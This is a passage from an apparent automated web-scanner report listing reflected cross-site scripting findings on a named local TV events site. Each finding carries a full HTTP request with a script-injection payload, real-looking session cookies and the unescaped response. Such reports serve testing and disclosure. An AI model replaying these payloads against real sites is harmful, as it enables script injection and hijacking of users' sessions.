Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:07:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 57
ETag: "75880169a64f5f1314a276556b25cc01"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:07:37 GMT; HttpOnly
Content-Length: 37962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/299065-the-kings-speech?76ea0"><script>alert(1)</script>a87ae6cc1e7=1" />
...[SNIP]...

4.427. http://events.cbs6albany.com/movies/show/324545-true-grit [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/324545-true-grit

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bb0d"><script>alert(1)</script>1a0648de9b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/324545-true-grit?1bb0d"><script>alert(1)</script>1a0648de9b6=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:59:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 460
ETag: "b3cd811ea4feb204d44d5aecc5aa9d94"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:59:48 GMT; HttpOnly
Content-Length: 42792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/324545-true-grit?1bb0d"><script>alert(1)</script>1a0648de9b6=1" />
...[SNIP]...

4.428. http://events.cbs6albany.com/movies/show/344645-no-strings-attached [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/344645-no-strings-attached

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59d9f"><script>alert(1)</script>8f21b9a1a18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/344645-no-strings-attached?59d9f"><script>alert(1)</script>8f21b9a1a18=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:55:07 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 75
ETag: "33aa3028c23b18b3ba7675801d88d7ef"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:55:07 GMT; HttpOnly
Content-Length: 43020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/344645-no-strings-attached?59d9f"><script>alert(1)</script>8f21b9a1a18=1" />
...[SNIP]...

4.429. http://events.cbs6albany.com/movies/show/346845-sanctum-3d [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/346845-sanctum-3d

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4654f"><script>alert(1)</script>bbe709d4b33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/346845-sanctum-3d?4654f"><script>alert(1)</script>bbe709d4b33=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:05:41 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 65
ETag: "bd20e45a7b4eb66383c85316387721cc"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:05:41 GMT; HttpOnly
Content-Length: 42066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/346845-sanctum-3d?4654f"><script>alert(1)</script>bbe709d4b33=1" />
...[SNIP]...

4.430. http://events.cbs6albany.com/movies/show/354805-sanctum [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/354805-sanctum

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d0d"><script>alert(1)</script>b30c7e194be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/354805-sanctum?a9d0d"><script>alert(1)</script>b30c7e194be=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:10:16 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 65
ETag: "d2ab463365aef1acc79b6bd1da2c72f8"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:10:16 GMT; HttpOnly
Content-Length: 39252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/354805-sanctum?a9d0d"><script>alert(1)</script>b30c7e194be=1" />
...[SNIP]...

4.431. http://events.cbs6albany.com/search [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 3ede7<script>alert(1)</script>1995b73f8f was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?st=event3ede7<script>alert(1)</script>1995b73f8f&swhen=Today HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:21 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 44
ETag: "4a81690f3b69186a513aae48693ae59a"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iClRvZGF5IgtidWNrZXRGIg1sb2NhdGlvbnsQIgljaXR5IgtBbGJhbnkiC3JhZGl1c2k3Ig1sYXRpdHVkZWYaNDIuNjUxNjk5OTk5OTk5OTk4AGbPIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTczLjc1NTA5OTk5OTk5OTk5OQBNaiIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdOWQ%3D%3D--01e026a8bd0da083a16cbd6b21a518a127f1b784; path=/; expires=Fri, 29-Apr-2011 05:48:21 GMT; HttpOnly
Content-Length: 17259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message">
Invalid search: event3ede7<script>alert(1)</script>1995b73f8f is not a valid search category.
</div>
...[SNIP]...

4.432. http://events.cbs6albany.com/search [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/search

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e880e"%3balert(1)//4f5e099d790 was submitted in the st parameter. This input was echoed as e880e";alert(1)//4f5e099d790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search?st=evente880e"%3balert(1)//4f5e099d790&swhen=Today HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 34
ETag: "75f0398b4f7123b6363fa4f06ca8cde8"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iClRvZGF5IgtidWNrZXRGIg1sb2NhdGlvbnsQIgljaXR5IgtBbGJhbnkiC3JhZGl1c2k3Ig1sYXRpdHVkZWYaNDIuNjUxNjk5OTk5OTk5OTk4AGbPIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTczLjc1NTA5OTk5OTk5OTk5OQBNaiIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdOWQ%3D%3D--01e026a8bd0da083a16cbd6b21a518a127f1b784; path=/; expires=Fri, 29-Apr-2011 05:48:09 GMT; HttpOnly
Content-Length: 16749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
"text";
google_ad_channel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "evente880e";alert(1)//4f5e099d790s";

//-->
...[SNIP]...

4.433. http://events.cbs6albany.com/search [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/search

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3295'%3balert(1)//c7b12d2e1bf was submitted in the st parameter. This input was echoed as f3295';alert(1)//c7b12d2e1bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search?st=eventf3295'%3balert(1)//c7b12d2e1bf&swhen=Today HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:14 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 33
